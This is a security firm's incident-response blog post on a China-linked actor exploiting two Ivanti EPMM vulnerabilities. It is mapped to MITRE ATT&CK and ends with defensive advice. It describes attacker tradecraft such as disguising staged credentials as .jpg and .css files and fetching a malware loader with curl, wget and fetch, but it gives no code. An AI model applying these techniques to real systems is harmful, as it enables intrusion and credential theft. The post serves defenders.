adarma_logo_twgt-black[11615449]
adarma_logo_twgt-black[11615449]
Security Consulting
Strategy & Transformation
Security Engineering
Assessments
Threat Intelligence Exposure Management
Detection & Response
Managed SOC
Microsoft MDR Solution
Security Engineering
Incident Response
Socket Platform
About Us
We Are Adarma

Your partner for effective cyber threat management
ESG

Protecting the promise of cyber resilience
Partners

Working in partnership to make the world a safer place
Careers

Become a Cyber Defender
Contact Us

Get in touch today
Insights
Cyber Hub
Cyber Insiders
News & Blog
Incident Preparedness
SIEM Transformation
Future-Ready SOC Report
SecOps Excellence
Events
Share:
June 4, 2025

China-Sponsored Threat Actor UNC5221 Exploits Ivanti Endpoint Manager: What You Need To Know

Adarma’s Incident Response Team breaks down the attack chain, technical indicators, and mitigation guidance.

Adarma’s Incident Response team recently responded to an incident involving the exploitation of Ivanti Endpoint Manager Mobile (EPMM) using a recently patched pair of vulnerabilities, CVE-2025-4427 and CVE-2025-4428, which, when chained, enable unauthenticated remote code execution on vulnerable devices.

It’s believed that the intrusion is part of a broader campaign attributed to UNC5221, thought to be part of the APT Gothic Panda, a threat group linked to the People’s Republic of China. UNC5221 undertakes exploitation campaigns against vulnerabilities affecting network edge appliances in particular to gain footholds on networks that host these devices, harvest credentials and move laterally in pursuit of greater access to confidential or proprietary information for exfiltration.

UNC5221 has a track record of exploiting vulnerabilities in edge infrastructure and targeting critical sectors across Europe, North America, and Asia-Pacific. They are known to target critical national infrastructure, as well as government, financial and technology sectors.

Key Insights

These vulnerabilities were disclosed and patched by Ivanti on 13 May 2025, exploitation took place two days later.

The attacker exploited the Ivanti appliance vulnerabilities before patching could be completed, demonstrating rapid operational use of newly disclosed vulnerabilities.

The threat actor’s methods and infrastructure show overlap with other UNC5221 campaigns, including mass exploitation of SAP NetWeaver instances (CVE-2025-31324) and exploitation of Ivanti related zero-days in late 2023.

The compromise progressed quickly from access to local reconnaissance and credential theft, staging and exfiltration, consistent with strategic pre-positioning rather than opportunistic activity.

Malware retrieved by the threat actor failed to execute and the redundant usage of multiple commands to achieve the same goal may represent unfamiliarity or uncertainty around the targeted appliance environment, potentially pointing to the speed with which this campaign would have been spun up.

 

Technical Breakdown

Attack Flow Summary

Based on timestamps of commands run, Adarma’s Incident Response Team believes the attacker’s activities were automated.

The threat actor gained access to the Ivanti EPMM through a chain of two vulnerabilities, CVE-2025-4427 (CVSS v3 score: 5.3) and CVE-2025-4428 (CVSS v3 score: 7.2), enabling unauthenticated remote code execution.

Once access was gained, the attacker ran multiple discovery commands and output the results to files disguised with .jpg extensions, saved in web-accessible folders for exfiltration.

Harvested credentials and certificates were also staged in this way, encoded in base64 and saved as .css files.

The attacker then retrieved a file from an Amazon Cloud Storage account, later identified as malware known as KrustyLoader. This malware was intended to install a Sliver C2 agent, configured to communicate with Amazon-hosted cloud infrastructure.

To improve download success, the attacker issued curl, wget, and fetch commands for the same file—suggesting a scripted approach incorporating redundancy, depending on what tools were available on the EPMM appliance. The Sliver agent ultimately failed to execute.

Mitre ATT&CK

Below we map the phases of the breach and actions undertaken by the threat actor during the intrusion to the Mitre ATT&CK framework.

Initial Access
T1190 – Exploit Public-Facing Applications
The threat actor used a combination of CVE-2025-4427 and CVE-2025-4428 to gain initial access. These vulnerabilities affect Ivanti EPMM Linux based appliances and enable unauthenticated remote code execution when chained.

Defense Evasion
T1027.010 – Obfuscated Files or Information: Command Obfuscation
The threat actor used base64 encoding in some of the scripted activity run on the breached server. Stolen credentials were also base64 encoded when output to files for collection.

Discovery
T1087.001: Account Discovery: Local Account
T1033: System Owner/User Discovery
T1082: System Information Discovery
T1049: System Network Connections Discovery
The threat actor issued discovery commands such as id, netstat, hostname, uname and whoami, with the output redirected to files for exfiltration and collection. These actions allowed the attacker to later map the environment and identify potential viable lateral movement paths.

Command and Control
T1105 – Ingress Tool Transfer
The threat actors retrieved what Adarma’s Incident Response Team determined to be KrustyLoader malware from Amazon hosted cloud storage. Curl, wget and fetch commands were issued for the same file, presumably to ensure that the file was downloaded successfully depending on which program was present on the EPMM appliance. This KrustyLoader malware included a Sliver C2 agent, which failed to run.

Credential Access
T1213 – Data from Information Repositories
T1649 – Steal or Forge Authentication Certificates
Post-compromise, the attacker harvested credentials stored in a MySQL database on the appliance. In addition, appliance specific certificates were collected and staged for exfiltration.

Collection
T1074.001 – Data Staged: Local Data Staging
The output of discovery commands were redirected to files with a .jpg extension saved in a web accessible directories for later retrieval. The output of the commands used for credential or certificate access were base64 encoded and saved as .css files in web accessible directories. These files were deleted after they were retrieved.

Exfiltration
T1567 – Exfiltration Over Web Services
Files staged in web accessible directories were retrieved.

Adarma Defensive Recommendations

To defend against campaigns like this, Adarma’s Threat Intelligence Team recommends the following actions to mitigate against the risks associated with this group:

Apply security patches to exposed infrastructure as soon as they’re released, especially for VPNs and other network edge appliances.

Assume public-facing systems are under continuous probing and prioritise network edge vulnerability scanning and remediation.

Isolate management interfaces from the internet and enforce strong authentication, including multi-factor authentication.

Review and monitor network edge appliance operating systems logs for early indicators of credential harvesting, reconnaissance, or abnormal service interaction.

Deploy and tune Endpoint Detection and Response tools with a focus on behavioural triggers linked to post-exploitation activity.

Conduct red team exercises that simulate exploitation of recent CVEs to validate response readiness.

 

Contact Us